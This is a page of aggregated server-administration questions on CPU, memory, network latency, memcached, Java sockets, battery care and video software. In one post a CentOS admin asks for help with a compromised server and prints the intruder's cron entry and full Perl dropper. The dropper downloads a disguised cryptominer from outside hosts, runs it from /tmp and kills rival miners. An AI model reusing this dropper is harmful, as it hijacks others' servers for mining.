Search Results

Search found 17045 results on 682 pages for 'high cpu usage'.

Page 65/682 | < Previous Page | 61 62 63 64 65 66 67 68 69 70 71 72  | Next Page >

  • Proper High-End Video Editing Software for Windows?

    - by Michael Stum
    I'm wondering if anyone here has experience with Prosumer/High-End Video Editing? So far I use Adobe Premiere CS4, but it is an unstable and buggy mess sadly. This could be partially caused by the fact that my input material isn't always pure HDV/AVCHD but sometimes it can be DivX or some already pre-processed video. The one thing I liked about Adobe is though that with After Effects and Encore, they have a good overall toolset, but if it's sub-par then it's no good. Luckily it is already paid for and was worth it's money overall, so It's not a complete waste of money. But are there alternatives? Especially After Effects is quite unique, and the closest thing I found is Apple's Final Cut Studio which includes Motion and DVD Studio. The two downsides is that it requires a Mac and that it doesn't support BluRay though. Any hints for Windows? Sony Vegas might be something I'll look at, but I'm guessing I have to keep using After Effects for some serious compositing/VFX?

    Read the article

  • Pinging switch results in alternating high/low response times

    - by Paul Pringle
    We have two switches that are behaving strangely. When I ping them the responses alternate between high and low results: C:\Users\paul>ping sw-linksys1 -t Pinging sw-linksys1.sep.com [172.16.254.235] with 32 bytes of data: Reply from 172.16.254.235: bytes=32 time=39ms TTL=64 Reply from 172.16.254.235: bytes=32 time=154ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Reply from 172.16.254.235: bytes=32 time=142ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Reply from 172.16.254.235: bytes=32 time=143ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Reply from 172.16.254.235: bytes=32 time=146ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Reply from 172.16.254.235: bytes=32 time=152ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Reply from 172.16.254.235: bytes=32 time=153ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Reply from 172.16.254.235: bytes=32 time=153ms TTL=64 Reply from 172.16.254.235: bytes=32 time=2ms TTL=64 Other switches in the network behave normally. I've rebooted the switches, but the behavior still is there with the ping. Any ideas on how to troubleshoot this? Thanks!

    Read the article

  • Network access lags for Win7 when server network utilization is high

    - by Jeff Miles
    We have a Dell PE2950 file server running Windows 2008, hosting a DFS namespace of ~1.2 TB. This server has two Broadcom 1Gbps NICs teamed together. When there is high traffic going to the server across the network (greater than 200 Mbps), any Windows 7 client accessing a DFS share at the time experiences severe performance problems. For example: Computer A has an AutoCAD drawing opened directly from the DFS share. Performance is normal, not causing any issues. Computer B begins a file transfer, putting a 11GB file onto a different DFS namespace, on the same server Computer A immediately notices lag while using AutoCAD. The cursor momentarily freezes within AutoCAD every 10 seconds or so, and any browsing of the DFS share is extremely slow. Computer B completes file transfer, and performance resumes to normal for Computer A. This is only affecting Windows 7 clients, using a variety of hardware (desktop + laptop). All of our Windows XP clients see no performance impact during the file transfer. Things I have tried with no change: Had Computer A work from an entirely different RAID array from the file transfer destination Updated NIC drivers on clients and server Enabled TCP offload and receive side scaling on the server NIC (previously disabled when the issue began) Antivirus disabled during file transfer I am currently having a user test applications other than AutoCAD when the file transfer occurs, and will update the question with that result. Does anyone have any recommendations for resolution or additional troubleshooting steps?

    Read the article

  • Best usage for a laptop being used as a desktop without removable batteries

    - by Senseful
    After reading the information on http://batteryuniversity.com, I realize that one of the best ways to permanently damage a lithium ion battery is to use the battery at a high temperature while it's fully charged. This is exactly what happens when you use the computer as if it were a desktop computer, since leaving it plugged in will keep the battery at 100% and using the computer will heat up the battery. This is why it's recommend to remove the battery from your laptop if you are using it is this scenario. My question is what would you do if the laptop doesn't have removable batteries (e.g. a MacBook Pro)? Should I use some kind of charge cycle such as: charge to 80%, unplug the power chord, use the laptop until it reaches 20%, then repeat the cycle by charging to 80% again? If so, which values should I use instead of 80% and 20%? (I think charging to 80% is better than 100% because of the damage that a hot battery at 100% can do, but I just made the figure 80% up, and I'm sure there's a better number to strive for which is backed by science.) I've read many of the articles on batteryuniversity.com, but couldn't find anything pertaining to this. Update: What about doing something like charge (or discharge) it to 50%, then plug it in and turn on settings which use the battery as much as possible (e.g. brightness all the way up, wi-fi on, etc.), in order to try to maintain the battery at 50% (i.e. the rate it is charging is the same as it is discharging). This will probably heat up the battery, but would make it so you don't need to constantly plug and unplug the laptop. The one bad thing is that you are taking up more charge cycles which would decrease the battery life, thus I'm not sure this is a good idea.

    Read the article

  • Unexpected(?) high 'wasted' memory in memcached

    - by Nanne
    Looking at our memcached stats I think I have found an issue I was not aware of before. It seems that we have a strangely high amount of wasted space. I checked with phpmemcacheadmin for a change, and found this image staring at me: Now I was under the impression that the worst-case scenario would be that there is 50% waste, although I am the first to admit not knowing all the details. I have read - amongst others- this page which is indeed somewhat old, but so is our version of memcached. I think I do understand how the system works (e.g.) I believe, but I have a hard time understanding how we could get to 76% wasted space. The eviction rate that phpmemcacheadmin shows is 2 ev/s, so there is some problem here. The primary question is: what can I do to fix this. I could throw more memory at it (there is some extra available I think), maybe I should fiddle with the slab config (is that even possible with this version?), maybe there are other options? Upgrading the memcached version is not a quickly available option. The secondairy question, out of curiosity, is of course if the rate of 75% (and rising) wasted space is expected, and if so, why. System: This is currently not something I can do anything about, I know the memcached version isn't the newest, but these are the cards I've been dealt. Memcached 1.4.5 Apache 2.2.17 PHP 5.3.5

    Read the article

  • wireless router - configuring for low-latency, high traffic environment

    - by Mark C
    Hey all, I have a few questions about configuring a router to achieve low-latency, high speed throughput on a local area network that is not connected to the internet. I've read up on some stuff, but thought I would solicit some opinions here on what I've found and what I want to know.... Turn off SSID broadcast - it produces extraneous packets that all clients receive and reply (?) to. Not a huge deal, but it may help a bit. Mixed-mode off - I should attempt to have all devices using the same standard (e.g. 802.11n) and turn mixed-mode off. Any thoughts on security? Does having WEP or any of the WPA variants actually increase latency? Nothing super secure is going over this LAN so if turning security off made things better, that'd be cool. Any other thoughts or things to focus on to create the low latency environment I'm trying to go for would be great. Links to webpages and papers are also cool. I'm open to go through a bunch of stuff. Thanks in advance!

    Read the article

  • Netgear CG3000D new Modem/Router - Random High Ping

    - by justin.chmura
    Cox just recently came out and looked at my internet and decided that the modem I had was causing high latency issue. The speed was fine but the ping would spike to around 100 and over when gaming or putting a load more than browsing on the line. After they replaced it, it seems like I get better latency, but when it spikes, I get upwards of over 300 ping with like 500 jitter. I figured I would hit the serverfault universe before sending another email to Cox. I opted not to do the Cox setup as it was an extra $20 which I thought would have just setup the wireless (which I can handle). Is it a setting or something that I missed that needs to be setup? The firmware for the CG3000D is awful and not fun to use. I did change some hidden settings on the RgServices.asp page (I'll attach a screenshot). I've also heard that the Router/Modem combos are awful and that I should go back and just ask for a modem stand-alone. Any input is helpful. All screenshots: http://imgur.com/a/JX6qu#0

    Read the article

  • High data on recv-q buffer and thread lock on java.io.BufferedInputStream in linux

    - by Sagar Patel
    We have a java application running on linux (ubuntu server). We have been facing high recv-q problem since quite some time. Application gets hang and does not read data from socket every few hours. In thread dump, we have found below stack trace. "Receiver-146" daemon prio=10 tid=0x00007fb3fc010000 nid=0x7642 runnable [0x00007fb5906c5000] java.lang.Thread.State: RUNNABLE at java.net.SocketInputStream. socketRead0(Native Method) at java.net.SocketInputStream.read(SocketInputStream.java:150) at java.net.SocketInputStream.read(SocketInputStream.java:121) at java.io.BufferedInputStream.fill(BufferedInputStream.java:235) at java.io.BufferedInputStream.read1(BufferedInputStream.java:275) at java.io.BufferedInputStream.read(BufferedInputStream.java:334) - locked <0x00000007688f1ff0> (a java.io.BufferedInputStream) at org.smpp.TCPIPConnection.receive(TCPIPConnection.java:413) at org.smpp.ReceiverBase.receivePDUFromConnection(ReceiverBase.java:197) at org.smpp.Receiver.receiveAsync(Receiver.java:351) at org.smpp.ReceiverBase.process(ReceiverBase.java:96) at org.smpp.util.ProcessingThread.run(ProcessingThread.java:199) at java.lang.Thread.run(Thread.java:722) We are not able to trace the exact reason behind this? Kindly help. We are using 16 core machine and load on the system is around 30-40 at the time of issue. We use command ss dst <ip> to find out recv-q. Recently we have been facing issues with recv-q size getting hung, were in receive buffer gets stuck at some point of time. But recvQ size is not decreasing and as a result we are losing a lot of hits from the other side, our application is not accepting any data.

    Read the article

  • MySQL Memory Limit Windows Server 2003

    - by Matt
    I am running MySQL 5.0.51a on Windows Server 2003 Standard Edition on an HP DL580 G4 with 3GB installed. One of my database tables has grown to 5.3 GB with an index file of 2.5 GB, which I believe is causing MySQL to be slow due to having to constantly load and unload the index file when updates are made to the table. The server itself seems to be performing OK because MySQL is only using about 500MB of memory (there are other apps running on the system, but MySQL uses the most memory). The table is fairly active with new records getting adding all during day but no deletes, ever. The MySQL server has up to 600 connections allowed, but only small number (10 or 20) would actually be writing to this table. I increased the memory limits in MySQL but since the max connections is so high I don't think I can give each connection 1GB without risking a problem. Is there some tuning that would let just certain connections get a lot of memory? So I have started to look for alternatives to avert the crisis I know is coming soon. Some of the options I have: Upgrade to Server 2003 Enterprise to install 64GB of memory. Question: would 32 bit MySQL be able to access more than 2GB? Would that be 2GB per thread? That would still be smaller than the index table size so it might not solve the problem completely, but it would be better than now. Upgrade to Server 200x 64 bit and MySQL 64 bit. Switch to a *nix 64 bit server. If anybody has suggestions for things to do in the meantime, opinions on which way to go, or other things that I have overlooked I would appreciate the help. Thanks

    Read the article

  • Developing high-performance and scalable zend framework website

    - by Daniel
    We are going to develop an ads website like http://www.gumtree.com/ (it will not be like this one but just to give you an ideea) and we are having some issues regarding performance and scalability. We are planning on using Zend Framework for this project but this is all that I'm sure off at this point. I don't think a classic approch like Zend Framework (PHP) + MySQL + Memcache + jQuery (and I would throw Doctrine 2 in there to) will fix result in a high-performance application. I was thinking on making this a RESTful application (with Zend Framework) + NGINX (or maybe MongoDB) + Memcache (or eAccelerator -- I understand this will create problems with scalability on multiple servers) + jQuery, a CDN for static content, a server for images and a scalable server for the requests and the rest. My questions are: - What do you think about my approch? - What solutions would you recommand in terms of servers approch (MySQL, NGINX, MongoDB or pgsql) for a scalable application expected to have a lot of traffic using PHP?...I would be interested in your approch. Note: I'm a Zend Framework developer and don't have to much experience with the servers part (to determin what would be best solution for my scalable application)

    Read the article

  • PHP hits 100% CPU and eats RAM at the same time Monday to Friday

    - by Daniel Samuels
    We run a learning platform for primary schools here in the UK and it's all been running extremely well. However at around 4PM Monday to Friday we see the same issue arise -- 1-2 PHP threads will spike to 100% CPU and gradually start eating up RAM until the server(s) fall over. 98%+ of our requests are HTTPS, these come into our Layer 7 load balancer which then decrypts the SSL data, adds the X-HTTP-Forwarded-For header and forwards the data onto an application server (we have 2 of those at the moment) on port 80. Our application servers have Varnish on port 80 which takes in the request from the load balancer and passes the request through to Nginx on port 81. Nginx then works out which 'vhost' it needs to use and passes any PHP processing through to PHP-CGI which is listening on a socket (managed through spawn-fcgi). There's an instance of Memcached running too, MySQL runs on a separate server / slave setup. Throughout the day the load will typically go no higher than 0.8 on either of the application servers, however at around 4PM our problem arises. I've managed to run strace on a few of the actual threads when they cause the problem and I always see the same thing: stat("/usr/share/zoneinfo/Europe/London", {st_mode=S_IFREG|0644,st_size=3661, ...}) = 0 stat("/usr/share/zoneinfo/Europe/London", {st_mode=S_IFREG|0644,st_size=3661, ...}) = 0 This is repeated infinitely and never stops until you SEGKILL the process or oomkiller kills it. There are no cron jobs scheduled to run at that time and I don't have any way of seeing exactly what Nginx request is associated with the PHP process which is running. We are running PHP 5.3.14 which we upgraded to from 5.3.8 last week to rule out the older version being the problem. This issue has been going on a few months now and we have no idea what is causing it. We deploy our software very frequently, so it's difficult to track down a specific release which may have started the problem - especially as we do not know the date of the first occurrence of this issue. Varnish is version 3.0.1, Nginx is 1.0.6 (which I understand is about a year old now), our servers are running CentOS release 5.7 (Final) they have Intel i3 540s at 3.07Ghz and 8GB of RAM. There's a discussion on the Debian mailing list about something very similar, you can find that here. Has anyone seen anything like this in the past, does anyone have any ideas or suggestions? Are there a way of linking an Nginx request directly to a PHP thread? Is there a better way of seeing what the PHP process is doing? (I've seen GDB mentioned, though I'll have to recompile PHP) Thanks!

    Read the article

  • Server to server replication and CPU and 32k\ corrupt doc

    - by nick wall
    Summary: if database contains a doc with 32K issue or corrupt, on server to server replication it causes marked increase in CPU in nserver.exe task, which effectively causes our server(s) to slow right down. We have a 5 server cluster (1 "hub" and 4 HTTP servers accessed via reverse proxy and SSO for load balancing and redundancy). All are physically located next to each other on network, they don't have dedicated network\ ports for cluster or replication. I realise IBM recommendation is dedicated port for cluster. Cluster queues are in tolerance and under heavy application user load, i.e. the maximum number of documents are being created, edited, deleted, the replication times between servers are negligible. Normally, all is well. Of the servers in the cluster, 1 is considered the "hub", and imitates a PUSH-PULL replication with it's cluster mates every 60mins, so that the replication load is taken by the hub and not cluster mates. The problem we have: every now and then we get a slow replication time from the hub to a cluster mate, sometimes up to 30mins. This maxes out the nserver.exe task on the "cluster mate" which causes it to respond to http requests very slowly. In the past, we have found that if a corrupt document is in the DB, it can have this affect, but on those occasions, the server log will show the corrupt doc noteId, we run fixup, all well. But we are not now seeing any record of corrupt docs. What we have noticed is if a doc with the 32K issue is present, the same thing can happen. Our only solution in that case is to run a : fixup mydb.nsf -V, which shows it is purging a 32K doc. Luckily we run a reverse proxy, so we can shut HTTP servers down without users noticing, but users do notice when a server has the problem! Has anyone else seen this occur? I have set up DDM event handlers for many of the replication events. I have set the replication time out limit to 5 mins (the max we usually see under full user load is 0.1min), to prevent it rep'ing for 30mins as before. This ia a temporary work around. Does anyone know of a DDM event to trap the 32K issue? we could at least then send alert. Regarding 32K issue: this prob needs another thread, but we are finding this relatively hard to find the source of the issue as the 32K event is fairly rare. Our app is fairly complex, interacting with various other external web services, with 2 way data transfer. But if we do encounter a 32K doc, we can't look at field properties, so we can't work out which field has issue which would give us a clue as to which process is culprit. As above, we run a fixup -V. Any help\ comments on this would be gratefully received.

    Read the article

  • Large Scale VHDL modularization techniques

    - by oxinabox.ucc.asn.au
    I'm thinking about implimenting a 16 bit CPU in VHDL. A simplish CPU. ADD, MULS, NEG, BitShift, JUMP, Relitive Jump, BREQ, Relitive BREQ, i don't know somethign along these lines Probably all only working with 16bit operands. I might even cut it down and use only a single operand and a accumulator. With Some status regitsters, Carry, Zero, Neg (unless i use a Accumlator), I know how to design all the parts from logic gates, and plan to build them up from first priciples, So for my ALU I'll need to 'build' a ADDer, proably a Carry Look ahead, group adder, this adder it self is make up oa a couple of parts, wich are themselves made up of a couple of parts. Anyway, my problem is not the CPU design, or the VHDL (i know the language, more or less). It's how i should keep things organised. How should I use packages, How should I name my processes and port maps? (i've never seen the benifit of naming the port maps, or processes)

    Read the article

  • Large Scale VHDL techniques

    - by oxinabox.ucc.asn.au
    I'm thinking about implimenting a 16 bit CPU in VHDL. A simplish CPU. ADD, MULS, NEG, BitShift, JUMP, Relitive Jump, BREQ, Relitive BREQ, i don't know somethign along these lines Probably all only working with 16bit operands. I might even cut it down and use only a single operand and a accumulator. With Some status regitsters, Carry, Zero, Neg (unless i use a Accumlator), I know how to design all the parts from logic gates, and plan to build them up from first priciples, So for my ALU I'll need to 'build' a ADDer, proably a Carry Look ahead, group adder, this adder it self is make up oa a couple of parts, wich are themselves made up of a couple of parts. Anyway, my problem is not the CPU design, or the VHDL (i know the language, more or less). It's how i should keep things organised. How should I use packages, How should I name my processes and port maps? (i've never seen the benifit of naming the port maps, or processes)

    Read the article

  • Understanding top output in Linux

    - by Rayne
    Hi, I'm trying to determine the CPU usage of a program by looking at the output from Top in Linux. I understand that %us means userspace and %sy means system/kernel etc. But say I see 100%us. Does this mean that the CPU is really only doing useful work? What if a CPU is tied up waiting for resources that are not avaliable, or cache misses, would it also show up in the %us column, or any other column? Thank you.

    Read the article

  • High apache load but little traffic logged

    - by nrambeck
    I recently installed Varnish to sit in front of Apache on a dedicated server running a single site. It appears to be working well, but the load on Apache is still very high. What doesn't make sense is that the Apache access log shows almost no traffic getting past Varnish. When I tail the apache log I see about 1-3 hits per second come through. Here is what the load on Apache looks like : USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND apache 13834 8.1 1.0 107716 34164 ? S 08:24 0:02 /usr/sbin/httpd apache 13835 8.1 1.0 107716 33856 ? S 08:24 0:02 /usr/sbin/httpd apache 11483 7.9 0.9 105916 30788 ? S 08:23 0:06 /usr/sbin/httpd apache 12255 7.5 1.0 107476 33312 ? S 08:24 0:04 /usr/sbin/httpd apache 9340 7.2 1.1 107732 34916 ? R 08:23 0:09 /usr/sbin/httpd apache 12029 6.8 0.9 106908 30416 ? S 08:24 0:04 /usr/sbin/httpd apache 11577 6.7 1.0 107192 34180 ? S 08:24 0:05 /usr/sbin/httpd apache 11486 6.6 1.0 106176 33112 ? S 08:23 0:05 /usr/sbin/httpd apache 11796 6.4 1.0 106936 31916 ? S 08:24 0:04 /usr/sbin/httpd apache 13815 6.3 1.0 107988 34464 ? S 08:24 0:02 /usr/sbin/httpd apache 18089 6.3 1.3 107444 43212 ? S 08:11 0:52 /usr/sbin/httpd apache 11797 5.9 1.0 107716 34580 ? S 08:24 0:04 /usr/sbin/httpd apache 7655 5.9 0.0 0 0 ? Z 08:22 0:09 [httpd] <defunct> mysql 8033 5.9 6.2 318240 199512 ? Sl May14 352:34 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/va apache 11488 5.8 0.9 106924 31632 ? S 08:23 0:04 /usr/sbin/httpd apache 9375 5.7 1.1 106956 35552 ? S 08:23 0:07 /usr/sbin/httpd apache 3551 5.6 1.1 106956 36140 ? S 08:20 0:14 /usr/sbin/httpd apache 7657 5.6 1.0 106968 32472 ? S 08:22 0:09 /usr/sbin/httpd apache 11433 5.6 1.0 107716 34396 ? S 08:23 0:04 /usr/sbin/httpd apache 5505 5.5 1.1 106944 34924 ? S 08:21 0:12 /usr/sbin/httpd apache 7172 5.3 1.1 106972 35368 ? S 08:22 0:09 /usr/sbin/httpd apache 10088 5.2 0.9 106160 31240 ? S 08:23 0:04 /usr/sbin/httpd apache 7656 5.1 1.0 106436 34388 ? S 08:22 0:08 /usr/sbin/httpd apache 3468 5.0 1.1 107716 35968 ? S 08:20 0:13 /usr/sbin/httpd apache 14242 4.8 1.0 107728 33032 ? S 08:25 0:00 /usr/sbin/httpd apache 3578 4.8 1.1 107988 35964 ? S 08:20 0:12 /usr/sbin/httpd apache 28192 4.8 1.2 106944 38060 ? S 08:17 0:23 /usr/sbin/httpd apache 3277 4.6 1.1 106956 35688 ? S 08:20 0:13 /usr/sbin/httpd apache 15434 3.7 0.7 106908 24684 ? S 08:25 0:00 /usr/sbin/httpd There is a default apache log and then one other VirtualHost log setup. I'm concerned that Apache is handling some kind of traffic that is not being logged. Is that possible? And is there anything I can do to capture that traffic?

    Read the article

  • MS Securily Essentials efficiency / usage, suspicious processes

    - by biggvsdiccvs
    I recently noticed that my (originally pretty fast) Windows 7 Pro laptop started getting slow and using a lot of CPU power for no apparent reason. A full scan by Microsoft Security Essentials revealed nothing. After some investigation, I found multiple instances of a strange process called urpev.exe and a couple of similar exe files sitting in subdirectories of Users//AppData/Roaming (this particular one was in a folder called Xyceowme). Description: "Mescrosift Visaal Studie 2010". Company name: "Mesrosift Corporatien". Is it a virus or something? :) Now, all of these exe files were scheduled to be started from the Task Scheduler by tasks with names like "Security Center Update - 1291373911" and similar. My user name was listed as the author of the tasks. I disabled the tasks, restarted the computer in safe mode and moved all of the exe files to quarantine for further investigation. All of this was done last night. I just scanned the files with Security Essentials again (not updated since yesterday) in the quarantine location and this time it found PWS:Win32/Zbot.gen!plock in urpev.exe (but not in the other exe files, which are most likely viruses, too). Category: Password Stealer Description: This program is dangerous and captures user passwords. Another strange process is browser.exe (not chrome.exe) by Google Inc., described as Google Chrome. I uninstalled Chrome but it's still there. It runs out of Users\\AppData\LocalLow\UIVoice\ToolMedium\browser.exe and if I move it in safe mode, it just reappears there, and multiple instances run. Needless to say, it I kill it, it just runs again. Couldn't see anything in Task Scheduler, but found a couple of references to it in the Registry Editor: HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/LowRegistry/Audio/PolicyConfig/PropertyStore/ HKEY_USERS/S-1-5-21-1685709306-872053864-2599010960-1002/Software/Microsoft/Internet Explorer/LowRegistry/Audio/PolicyConfig/PropertyStore/ Maybe it's a legit process, but seems kind of strange. For the time being, I suspended the process and killed all of the child processes when I booted up the laptop. I used Security Essentials to scan the system periodically, but obviously it's not effective at least against one virus. I had the "real-time protection" turned off. Would it help if it were turned on and how much of a nuisance would it be? I wonder if there is a better alternative to Security Essentials. Over the years I've used multiple antivirus products at home and especially at work and was not very happy with any of them. Apparently, asking for software recommendations or comparisons is taboo here, but I will mention that I installed Malware Bytes and it was able to find an quarantine a bunch of suspicious files, and at least some of which were truly infected, but when it scans the bogus security center update executables from Mesrosift Corporatien, it finds nothing wrong. Also, any thoughts on the browser.exe mystery? Neither MS Security Essentials nor Malware Bytes found anything wrong with that file. However, after I ran a Malware Bytes scan and quarantined everything it found suspicious and rebooted the laptop, the process did not run.

    Read the article

  • ./kernelupdates 100% cpu usage

    - by Vaibhav Panmand
    I have a CENTOS6 server running with some wordpress & tomcat websites. In the last two days it has been crashing continuously. After investigation we found that kernelupdates binary consuming 100% cpu on server. Process is mentioned below. ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx But this process seems invalid kernel update. Might be server is compromised and this process is installed by hacker, So I've killed this process & removed apache user's cron entries. But somehow this process started again after couple of hours & cron entries also restored, I am searching for the thing which is modifying cron jobs. Does this process belong to a mining process? How can we stop cronjob modification and clean the source of this process? Cron entry (apache user) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 || $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.ice-unix`; $cratch=`ps aux | grep -v grep | grep kernelupdates`; if($cratch=~/kernelupdates/gi) { die; } if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) { $wig=`wget --version | grep GNU`; if(length($wig>6)) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } else { system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates"); } } } @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); print "done!\n"; Thanks in advance!

    Read the article

  • Getting started with webserver clustering.

    - by Ernie
    I work for a small ISP, and we host about 250 domains and all the stuff that goes along with that: DNS, mail, spam filtering, and backups. Currently, we have separate DNS servers (two of them) and mail servers (outgoing mail is actually on the secondary DNS server, but was previously on its own server). In the past, this was done as an insurance measure. The last thing we need is for some doofus (usually yours truly) to hose a server, taking out DNS and mail right along with it, or for spammers to jam our incoming SMTP server, preventing outgoing mail from being sent too. In the past, this was a problem, and our servers were set up the way they are now to combat it. However, clustering solutions like Sun's Cobalt RAQ (in days of olde) and Virtualmin appear to cater to an all-in-one approach, then deal with failures through redundant servers. I have avoided this thus far, but we've been using Virtualmin on our web server for a while now, and I'd like to expand into using it for a high availability cluster. Our networking partner has recently built a datacenter that has eliminated all of our other bugaboos like network, cooling, and power issues, so now the only thing left to go wrong is me hosing a server, which happened earlier this month. One of the bigger reasons we've avoided going this route is because our hardware requirements aren't particularly high. One server easily handles all the sites we host (most of them are flat sites). Also, load-balancing routers tend to be expensive and complicated. All that I'm really expecting to do is building a two-node cluster for redundancy so that when I hose a server (however rare that might be), we're not out for 8-12 hours while I rebuild it. What I need to know is how to get started, and if I'm really in a position to bother with this kind of thing at all.

    Read the article

  • Unusually high memory usage on a CentOS VPS with 512 guaranteed RAM

    - by Andrei Bârsan
    I'm working on a medium-sized web application written in PHP that's running on a VPS with 512mb ram. The webapp hasn't been officially launched yet, so there isn't too much traffic going on, just me and a few other people working on it. There is another slightly smaller webapp also hosted on this machine, among 4-5 other small static sites. We are running Centos 5 32-bit & cPanel/WHM. This is the result of running ps aux and, as you can see, it's not using 100% of the RAM. However, on the hypanel overview, it's always shown as using aroun 500MB ram, just for running apache, mysql, and the lowest-memory-footprint versions of the mail server, ftp server etc. -bash-3.2# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.0 2156 664 ? Ss 12:08 0:00 init [3] root 1123 0.0 0.0 2260 548 ? S<s 12:08 0:00 /sbin/udevd -d root 1462 0.0 0.0 1812 568 ? Ss 12:08 0:00 syslogd -m 0 named 1496 0.0 0.0 3808 820 ? Ss 12:08 0:00 nsd named 1497 0.0 0.0 10672 756 ? S 12:08 0:00 nsd named 1499 0.0 0.0 3880 584 ? S 12:08 0:00 nsd root 1514 0.0 0.1 7240 1064 ? Ss 12:08 0:00 /usr/sbin/sshd root 1522 0.0 0.0 2832 832 ? Ss 12:08 0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid root 1534 0.0 0.1 3712 1328 ? S 12:08 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql - mysql 1667 0.0 2.9 225680 30884 ? Sl 12:08 0:00 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql - mailnull 1766 0.0 0.1 9352 1100 ? Ss 12:08 0:00 /usr/sbin/exim -bd -q60m root 1797 0.0 0.0 2156 708 ? Ss 12:08 0:00 /usr/sbin/dovecot root 1798 0.0 0.0 2632 1012 ? S 12:08 0:00 dovecot-auth root 1816 0.0 3.0 38580 32456 ? Ss 12:08 0:01 /usr/local/bin/spamd -d --allowed-ips=127.0.0.1 --pidfi root 1839 0.0 1.6 63200 17496 ? Ss 12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL root 1846 0.0 0.1 5416 1468 ? Ss 12:08 0:00 pure-ftpd (SERVER) root 1848 0.0 0.1 6212 1244 ? S 12:08 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin root 1856 0.0 0.1 4492 1112 ? Ss 12:08 0:00 crond root 1864 0.0 0.0 2356 428 ? Ss 12:08 0:00 /usr/sbin/atd dovecot 1927 0.0 0.1 5196 1952 ? S 12:08 0:00 pop3-login dovecot 1928 0.0 0.1 5196 1948 ? S 12:08 0:00 pop3-login dovecot 1929 0.0 0.1 5316 2012 ? S 12:08 0:00 imap-login dovecot 1930 0.0 0.2 5416 2228 ? S 12:08 0:00 imap-login root 1939 0.0 0.1 3936 1964 ? S 12:08 0:00 cPhulkd - processor root 1963 0.0 0.8 15876 8564 ? S 12:08 0:00 cpsrvd (SSL) - waiting for connections root 1966 0.0 0.7 15172 7748 ? S 12:08 0:00 cpdavd - accepting connections on 2077 and 2078 root 1990 0.0 0.2 5008 3136 ? S 12:08 0:00 queueprocd - wait to process a task root 2017 0.0 2.9 38580 31020 ? S 12:08 0:00 spamd child root 2018 0.0 0.5 8904 5636 ? S 12:08 0:00 /usr/bin/perl /usr/local/cpanel/bin/leechprotect nobody 2021 0.0 3.2 66512 33724 ? S 12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 2022 0.0 3.1 67812 33024 ? S 12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 2024 0.0 1.9 64364 20680 ? S 12:08 0:00 /usr/local/apache/bin/httpd -k start -DSSL root 2027 0.0 0.4 9000 4540 ? S 12:08 0:00 tailwatchd root 2032 0.0 0.1 4176 1836 ? SN 12:08 0:00 cpanellogd - sleeping for logs nobody 3096 0.0 1.9 64572 20264 ? S 12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 3097 0.0 2.8 66008 30136 ? S 12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 3098 0.0 2.8 65704 29752 ? S 12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 3099 0.0 3.1 67260 32816 ? S 12:09 0:00 /usr/local/apache/bin/httpd -k start -DSSL andrei 3448 0.0 0.1 3204 1632 ? S 12:50 0:00 imap nobody 3537 0.0 1.9 64308 20108 ? S 13:01 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 3614 0.0 1.9 64576 20628 ? S 13:10 0:00 /usr/local/apache/bin/httpd -k start -DSSL nobody 3615 0.0 1.3 63200 14672 ? S 13:10 0:00 /usr/local/apache/bin/httpd -k start -DSSL root 3626 0.0 0.2 10232 2964 ? Rs 13:14 0:00 sshd: root@pts/0 root 3648 0.0 0.1 3844 1600 pts/0 Ss 13:14 0:00 -bash root 3826 